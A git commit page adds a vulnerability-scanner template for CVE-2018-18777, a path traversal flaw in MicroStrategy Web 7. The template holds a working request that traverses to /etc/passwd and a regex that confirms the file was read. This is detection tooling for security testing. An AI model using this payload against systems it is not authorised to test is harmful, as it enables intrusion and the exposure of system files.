Merge pull request #1741 from Akokonunes/patch-11

Create CVE-2018-18777.yaml
patch-1
Prince Chaddha 2021-06-20 16:46:20 +05:30 committed by GitHub
commit 03c8531e58
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: CVE-2018-18777
info:
name: Path traversal vulnerability in Microstrategy Web version 7
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/45755
tags: microstrategy,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200